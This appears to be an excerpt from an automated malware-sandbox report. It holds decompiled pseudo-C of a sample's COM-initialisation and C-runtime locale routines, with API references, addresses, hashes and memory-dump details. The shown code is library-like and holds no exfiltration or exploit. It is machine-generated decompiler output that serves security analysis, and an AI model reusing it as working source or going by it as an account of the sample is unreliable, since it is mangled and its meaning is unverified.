				 *(_t164 + 0x2d8) = 0;
				 *((intOrPtr*)(_t164 + 0x2dc)) = 0;
				E00DDFBE0(_t164,  &_v164, 0, 0x94);
				_t174 = _t173 + 0xc;
				_v164.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v164);
				if(_v164.dwMajorVersion < 6) {
					__eflags = 0;
				} else {
					__eax = _a36;
				}
				 *(_t164 + 0xac) = 0;
				 *(_t164 + 0xb0) =  *(_t164 + 0xb0) & 0x00000000;
				 *(_t164 + 0xb4) =  *(_t164 + 0xb4) & 0x00000000;
				__eflags = _t166;
				if(_t166 == 0) {
					_t166 = 0x58;
				}
				_t96 = E00DE5836();
				 *(_t164 + 0xa8) = _t96;
				_t145 = _t166;
				__eflags = _t96;
				if(__eflags == 0) {
					E00CAA501(_t143, _t145, _t164, _t166, __eflags);
					goto L30;
				} else {
					E00DDFBE0(_t164, _t96, 0, _t166);
					_t149 = _t164 + 0x1cc;
					 *_t149 = 0;
					_t162 = _t164 + 0xcc;
					 *_t162 = 0;
					_t174 = _t174 + 0xc;
					 *(_t164 + 0x2d4) =  *(_t164 + 0x2d4) & 0x00000000;
					 *((intOrPtr*)(_t164 + 0x2d0)) = 0;
					_t107 = _a8;
					 *(_t164 + 0xc4) = _t107;
					asm("sbb eax, eax");
					 *((intOrPtr*)(_t164 + 0x80)) =  ~_t107 + 0x7005;
					 *( *(_t164 + 0xa8)) = _t166;
					_t169 = 0x104;
					 *((intOrPtr*)( *(_t164 + 0xa8) + 0x1c)) = _t149;
					 *( *(_t164 + 0xa8) + 0x20) = 0x104;
					 *((intOrPtr*)( *(_t164 + 0xa8) + 0x3c)) = _a12;
					 *((intOrPtr*)( *(_t164 + 0xa8) + 0x24)) = _t162;
					 *((intOrPtr*)( *(_t164 + 0xa8) + 0x28)) = 0x100;
					 *( *(_t164 + 0xa8) + 0x34) =  *( *(_t164 + 0xa8) + 0x34) | _a20 | 0x00080020;
					__eflags = _a20 & 0x00000040;
					if(__eflags != 0) {
						_t141 =  *(_t164 + 0xa8);
						_t56 = _t141 + 0x34;
						 *_t56 =  *(_t141 + 0x34) & 0xff7fffff;
						__eflags =  *_t56;
					}
					_t118 = E00CACEEE(_t143, _t164, _t169, __eflags);
					_t152 =  *((intOrPtr*)(_t118 + 0xc));
					 *((intOrPtr*)( *(_t164 + 0xa8) + 8)) =  *((intOrPtr*)(_t118 + 0xc));
					 *((intOrPtr*)( *(_t164 + 0xa8) + 0x44)) = E00CC2EC5;
					_t121 = _v172;
					__eflags = _t121;
					if(_t121 != 0) {
						_t121 = E00CA4F80(_t143, _t152, _t164, _t169, E00DEC22B(_t164 + 0x1cc, _t169, _t121, 0xffffffff));
						_t174 = _t174 + 0x14;
					}
					__eflags = _t143;
					if(_t143 != 0) {
						_t169 = _t164 + 0xc8;
						_push(E00DEC1A0(_t143));
						E00CA2CD7(_t143, _t169, _t164, _t169, _t143);
						_t137 = E00CA2BCE(_t143, _t169, _t169, 0);
						while(1) {
							_t138 = E00DEBE7D(_t137, 0x7c);
							__eflags = _t138;
							if(_t138 == 0) {
								break;
							}
							 *_t138 = 0;
							_t137 = _t138 + 1;
							__eflags = _t138 + 1;
						}
						_t121 =  *_t169;
						 *( *(_t164 + 0xa8) + 0xc) = _t121;
					}
					__eflags =  *(_t164 + 0xac) - 1;
					if( *(_t164 + 0xac) != 1) {
						L28:
						return E00DDD50E(_t143, _t164, _t169);
					} else {
						__imp__CoInitializeEx(0, 2);
						__eflags = _t121;
						if(_t121 < 0) {
							L27:
							_t82 = _t164 + 0xac;
							 *_t82 =  *(_t164 + 0xac) & 0x00000000;
							__eflags =  *_t82;
							goto L28;
						} else {
							_t124 =  &_v168;
							 *((intOrPtr*)(_t164 + 0x2dc)) = 0xe1b0b4;
							_push(_t124);
							_push(0xe1b290);
							_t143 = _t164 + 0x2d8;
							_push(1);
							 *_t143 = 0xe1b084;
							_push(0);
							__eflags =  *(_t164 + 0xc4);
							if( *(_t164 + 0xc4) == 0) {
								_push(0xe3ef8c);
							} else {
								_push(0xe3ef7c);
							}
							__imp__CoCreateInstance();
							__eflags = _t124;
							if(_t124 < 0) {
								goto L27;
							} else {
								_t154 = _v168;
								_t166 =  *( *_t154);
								_t145 = _t166;
								 *0xe17a64(_t154, 0xe1b2a0,  &_v176);
								__eflags =  *_t166();
								if(__eflags < 0) {
									L30:
									E00CAA4E7(_t143, _t145, _t164, _t166, __eflags);
									asm("int3");
									 *_t145 = 0xe1aed0;
									_push(0xffffffff);
									_push(0xe07b5e);
									_push( *[fs:0x0]);
									_push(_t166);
									_t100 =  *0xe68dd4; // 0x8d2643c2
									_push(_t100 ^ _t174);
									 *[fs:0x0] =  &_v20;
									_t167 = _t145;
									 *_t167 = 0xe19e60;
									if( *((intOrPtr*)(_t167 + 0x20)) != 0) {
										E00CB23A9(_t143, _t145, _t162);
									}
									_t103 = E00CB09A9(_t167);
									 *[fs:0x0] = _v16;
									return _t103;
								} else {
									_t155 = _v168;
									_t166 =  *( *_t155 + 0x1c);
									_t145 = _t166;
									 *0xe17a64(_t155, _t143, _t164 + 0xb8);
									__eflags =  *_t166();
									if(__eflags < 0) {
										goto L30;
									} else {
										 *(_t164 + 0xbc) = _v168;
										 *((intOrPtr*)(_t164 + 0xc0)) = _v176;
										goto L28;
									}
								}
							}
						}
					}
				}
			}

0x00cc3100
0x00cc3100
0x00cc310a
0x00cc310f
0x00cc3111
0x00cc311a
0x00cc311d
0x00cc3120
0x00cc312c
0x00cc3132
0x00cc3137
0x00cc313b
0x00cc3141
0x00cc3147
0x00cc314e
0x00cc3152
0x00cc315e
0x00cc316b
0x00cc3170
0x00cc3173
0x00cc3184
0x00cc3191
0x00cc3198
0x00cc3193
0x00cc3193
0x00cc3193
0x00cc319a
0x00cc31a0
0x00cc31a7
0x00cc31ae
0x00cc31b0
0x00cc31b4
0x00cc31b4
0x00cc31b6
0x00cc31bb
0x00cc31c1
0x00cc31c2
0x00cc31c4
0x00cc33cb
0x00000000
0x00cc31ca
0x00cc31ce
0x00cc31d5
0x00cc31db
0x00cc31dd
0x00cc31e3
0x00cc31e5
0x00cc31e8
0x00cc31ef
0x00cc31f5
0x00cc31f8
0x00cc3200
0x00cc3207
0x00cc3213
0x00cc3215
0x00cc3220
0x00cc3229
0x00cc3235
0x00cc323e
0x00cc3247
0x00cc325c
0x00cc325f
0x00cc3263
0x00cc3265
0x00cc326b
0x00cc326b
0x00cc326b
0x00cc326b
0x00cc3272
0x00cc3277
0x00cc3280
0x00cc3289
0x00cc3290
0x00cc3296
0x00cc3298
0x00cc32ab
0x00cc32b0
0x00cc32b0
0x00cc32b3
0x00cc32b5
0x00cc32b8
0x00cc32c4
0x00cc32c8
0x00cc32d1
0x00cc32dc
0x00cc32df
0x00cc32e6
0x00cc32e8
0x00000000
0x00000000
0x00cc32d8
0x00cc32db
0x00cc32db
0x00cc32db
0x00cc32f0
0x00cc32f2
0x00cc32f2
0x00cc32f5
0x00cc32fc
0x00cc33c1
0x00cc33c8
0x00cc3302
0x00cc3306
0x00cc330c
0x00cc330e
0x00cc33ba
0x00cc33ba
0x00cc33ba
0x00cc33ba
0x00000000
0x00cc3314
0x00cc3314
0x00cc331a
0x00cc3324
0x00cc3325
0x00cc332c
0x00cc3332
0x00cc3334
0x00cc333a
0x00cc333b
0x00cc3341
0x00cc334a
0x00cc3343
0x00cc3343
0x00cc3343
0x00cc334f
0x00cc3355
0x00cc3357
0x00000000
0x00cc3359
0x00cc3359
0x00cc3361
0x00cc3370
0x00cc3372
0x00cc337a
0x00cc337c
0x00cc33d0
0x00cc33d0
0x00cc33d5
0x00cc33d6
0x00cbcfc5
0x00cbcfc7
0x00cbcfd2
0x00cbcfd3
0x00cbcfd4
0x00cbcfdb
0x00cbcfdf
0x00cbcfe5
0x00cbcfeb
0x00cbcff1
0x00cbcff3
0x00cbcff3
0x00cbcffa
0x00cbd002
0x00cbd00c
0x00cc337e
0x00cc337e
0x00cc3386
0x00cc3392
0x00cc3394
0x00cc339c
0x00cc339e
0x00000000
0x00cc33a0
0x00cc33a6
0x00cc33b2
0x00000000
0x00cc33b2
0x00cc339e
0x00cc337c
0x00cc3357
0x00cc330e
0x00cc32fc

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC310A
GetVersionExA.KERNEL32(00000094), ref: 00CC3184
__cftof.LIBCMT ref: 00CC32A5
_strlen.LIBCMT ref: 00CC32BE
CoInitializeEx.OLE32(00000000,00000002), ref: 00CC3306
CoCreateInstance.OLE32(00E3EF8C,00000000,00000001,00E1B290,?), ref: 00CC334F

Strings

@, xrefs: 00CC325F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CreateH_prolog3_InitializeInstanceVersion__cftof_strlen
String ID: @
API String ID: 3157603938-2766056989
Opcode ID: e880b143880d77c623e188c89b482f70453983f6b5a67ee5c264b1f77a6c22f5
Instruction ID: 717b8baace4a8edc3570cdb4626c52dac1587d42a6b628b4451bc2bc1dcd2579
Opcode Fuzzy Hash: e880b143880d77c623e188c89b482f70453983f6b5a67ee5c264b1f77a6c22f5
Instruction Fuzzy Hash: 5281BD70B00752AFD744DF24C845F9ABBA4BF09314F008299E959A7391DB70AA48CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF2EB3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E00DF2EB3(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E00DF598E(0x6a6);
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0xe422f0);
					_push( *0xe4222c);
					E00DF2DEF(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0xe4222c;
					while(1) {
						L2:
						_t254 = E00DEDD9C(_t428, 0x351, 0xe422ec);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xe422f0);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E00DF2DEF(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0xe4225c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00DF47C5(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00DF47C5( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E00DF47C5( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E00DF47C5( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E00DF47C5( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00DE2347();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0xe68dd4; // 0x8d2643c2
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E00DF2EB3(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E00DF2A29(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E00DF9D65(_t445, 0xe422e4);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0xe4222c;
													_v456 = 1;
													do {
														_t273 = E00DF478B( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0xe4225c;
													} while (_t368 <= 0xe4225c);
													_t365 = _v468 + 2;
													_t274 = E00DFF20F(_t382, _t365, 0xe422ec);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E00DF13C5( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00DE2347();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0xe68dd4; // 0x8d2643c2
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E00DF4B3D(_t386, _t424) + 0x278;
																_t287 = E00DF2A29(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E00DF598E(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E00DEC133(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E00DE2347();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E00DF52FE(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E00DF2746(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E00DF9C62(_t424, __eflags, _v712, 1, 0xe421a0, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E00DDFDA6( &_v536,  *0xe68ee0, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0xe42228; // 0xca3f1c
																					 *0xe17a64(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0xe69050;
																						if(_t402 == 0xe69050) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E00DF47C5( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E00DF47C5( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E00DF47C5( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E00DF47C5( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E00DF47C5(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E00DDCBCE(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E00DDD045();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
